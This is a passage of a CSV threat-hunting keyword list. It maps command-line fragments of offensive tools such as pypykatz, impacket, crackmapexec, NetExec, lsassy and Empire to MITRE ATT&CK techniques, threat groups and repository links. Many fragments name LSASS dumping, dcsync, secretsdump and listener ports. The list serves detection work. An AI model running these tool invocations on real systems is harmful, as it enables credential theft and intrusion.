Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live lsa -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live lsa -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live process create -c regedit*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb client *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb dcsync *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb lsassdump *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb regdump *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb secretsdump *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smbapi localgroup enum -t*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smbapi session enum *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smbapi share enum*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live users whoami*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -LLMNRTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -llmnrtypes AAAA*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --llvm-obfuscator * ","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"* LMHASH:NTHASH*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -LNKPath * -EncScript *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* load_extra_pots*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --load-dll *ssp.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* --load-shellcode *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* local class-instances SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local class-properties SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local grep *ccmsetup started *ccmsetup.log*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local query * FROM SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local secrets -m disk*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local secrets -m wmi*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* --local-auth --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -lockless -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --loggedon-users*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --lport 1337 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* LPORT=4444*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* lsa minidump * -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* lsa minidump *.dmp*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* lsa minidump *.dmp*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* lsa minidump /*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* lsass_creds.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* lsassy -k -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"* lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -M dfscoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M empire_exec -o LISTENER=http-listener*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M gpp_autologin*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M handlekatz *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M keepass_trigger -o ACTION=ALL USER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -m lagentcmd *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"* -M laps --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M lsassy *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M MAQ --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M masky *CA=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ms17-010 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M mssql_priv *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 